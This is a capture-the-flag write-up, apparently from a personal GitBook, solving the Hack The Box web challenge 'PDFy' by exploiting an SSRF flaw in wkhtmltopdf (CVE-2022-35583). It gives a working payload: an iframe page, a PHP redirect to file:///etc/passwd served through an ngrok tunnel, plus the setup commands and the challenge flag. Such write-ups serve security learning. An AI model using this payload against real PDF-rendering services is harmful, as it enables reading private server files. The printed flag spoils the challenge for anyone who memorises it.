Write-Ups
Write-Ups
Write-Ups
  • ๐Ÿ“™Write-Ups
  • ๐Ÿ”‹Hack The Box
    • ๐Ÿ•น๏ธChallenges
      • ๐ŸŽฐAI - ML
        • โ˜„๏ธAI SPACE
      • โ›“๏ธBlockchain
        • ๐ŸคธSurvival of the Fittest
      • ๐Ÿ”ฎCrypto
        • ๐Ÿ‘ถBaby Time Capsule
        • ๐Ÿ•บThe Last Dance
      • โชReversing
        • BabyEncryption
        • ๐ŸŒ’Behind the Scenes
        • ๐ŸฃBabyEncryption
        • ๐Ÿ’นSimple Encryptor
      • ๐ŸŽ›๏ธHardware
        • ๐Ÿ’‰The Needle
        • ๐Ÿ”Photon Lockdown
      • ๐ŸฅธOSINT
        • ๐Ÿ’ธMoney Flowz
      • ๐Ÿ•ธ๏ธWeb
        • ๐Ÿดโ€โ˜ ๏ธFlag Command
        • ๐Ÿ’“LoveTok
        • ๐Ÿ—’๏ธPDFy
        • jscalc
        • ๐Ÿ™ˆProxyAsAService
        • ApacheBlaze
        • โ“RenderQuests
        • ๐Ÿ’ฅNeonify
        • ๐Ÿ˜‘No Treshold
        • ๐ŸŽ‘Breathtaking View
    • ๐ŸฐFortress
      • ๐Ÿฆ™AWS
    • ๐Ÿ’ปMachines
      • ๐ŸŽ’Backfire
      • ๐Ÿ’ฅBigBang
      • ๐Ÿˆโ€โฌ›Cat
      • โœ”๏ธChecker
      • ๐ŸถDog
      • ๐ŸงงEnvironment
      • ๐Ÿ‘ฎEscapeTwo
      • โšœ๏ธEureka
      • ๐ŸฆNocturnal
      • ๐Ÿ”žUnderPass
      • ๐ŸšขTitanic
      • TheFrizz
      • ๐ŸฐWhiteRabbit
    • ๐ŸงSherlocks
      • Meerkat
      • Bumblebee
    • ๐ŸฅผProLabs
      • ๐ŸƒFullHouse
    • ๐Ÿ’€Season 8
    • ๐Ÿฆ“Scripts/Functions/Tools
  • ๐Ÿ’”PortSwigger
    • ๐Ÿ›ฃ๏ธLearning Path
      • โ™ฟApi testing
        • Lab: Exploiting an API endpoint using documentation
        • Lab: Finding and exploiting an unused API endpoint
        • Lab: Exploiting a mass assignment vulnerability
        • Lab: Exploiting server-side parameter pollution in a query string
      • ๐Ÿ”Authentication vulnerabilities
        • Lab: Username enumeration via different responses
        • Lab: Username enumeration via subtly different responses
        • Lab: Username enumeration via response timing
        • Lab: Broken brute-force protection, IP block
        • Lab: Username enumeration via account lock
        • Lab: 2FA simple bypass
        • Lab: 2FA broken logic
        • Lab: Brute-forcing a stay-logged-in cookie
        • Lab: Offline password cracking
        • Lab: Password reset broken logic
        • Lab: Password reset poisoning via middleware
        • Lab: Password brute-force via password change
      • ๐Ÿ“File upload vulnerabilities
        • Lab: Remote code execution via web shell upload
        • Lab: Web shell upload via Content-Type restriction bypass
        • Lab: Web shell upload via path traversal
      • ๐Ÿ“‰GraphQL API vulnerabilities
        • Lab: Accessing private GraphQL posts
        • Lab: Accidental exposure of private GraphQL fields
        • Lab: Finding a hidden GraphQL endpoint
        • Lab: Bypassing GraphQL brute force protections
        • Lab: Performing CSRF exploits over GraphQL
      • ๐Ÿ–ฅ๏ธServer-side vulnerabilities
        • ๐Ÿ›ค๏ธPath traversal
          • Lab: File path traversal, simple case
        • ๐Ÿ›‚Access control
          • Lab: Unprotected admin functionality
          • Lab: Unprotected admin functionality with unpredictable URL
          • Lab: User role controlled by request parameter
          • Lab: User ID controlled by request parameter, with unpredictable user IDs
          • Lab: User ID controlled by request parameter with password disclosure
        • ๐Ÿ”Authentication
          • Lab: Username enumeration via different responses
        • ๐Ÿ–ฅ๏ธServer-side request forgery(SSRF)
          • SSRF attacks against the server
          • Lab: Basic SSRF against the local server
          • Lab: Basic SSRF against another back-end system
        • ๐Ÿ†™File upload vulnerabilities
          • Lab: Remote code execution via web shell upload
          • Lab: Web shell upload via Content-Type restriction bypass
        • ๐Ÿ‘ŠOS command injection
          • Lab: OS command injection, simple case
        • ๐Ÿ’‰SQL injection (SQLi)
          • Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
          • Lab: SQL injection vulnerability allowing login bypass
      • ๐ŸงฆWebSockets
        • Lab: Manipulating WebSocket messages to exploit vulnerabilities
        • Lab: Manipulating the WebSocket handshake to exploit vulnerabilities
        • Lab: Cross-site WebSocket hijacking
Powered by GitBook
On this page
  1. Hack The Box
  2. Challenges
  3. Web

PDFy

https://app.hackthebox.com/challenges/PDFy

Last updated 8 months ago

By intercepting the request we can changing the url we can see wkhtmltopdf is used to create pdfs

We can use this CVE to get the flag from /etc/passwd

index.html
<!DOCTYPE html>
<body>
    <iframe src="http://0.tcp.eu.ngrok.io:15500/flag.php?x=/etc/passwd" style="height:800px;width:100%"></iframe>
</body>
</html>
flag.php
<?php header('location:file://'.$_REQUEST['x']); ?>

First we are starting the php-server:

php -S 127.0.0.1:8000

We need an account ngrok and must enter a valid CC("We require a valid card as a way to combat abuse and keep the internet a safe place")

ngrok tcp 127.0.0.1:8000

We are coyping the tcp and change the protocol to http. Entering both in our pdy-file and send it to the server.

HTB{pdF_g3n3r4t1on_g03s_brrr!}
๐Ÿ”‹
๐Ÿ•น๏ธ
๐Ÿ•ธ๏ธ
๐Ÿ—’๏ธ
Logo[Security 9.8 CRITICAL] CVE-2022-35583 - wkhtmlTOpdf 0.12.6 is vulnerable to SSRF (Server-side request forgery) ยท Issue #5249 ยท wkhtmltopdf/wkhtmltopdfGitHub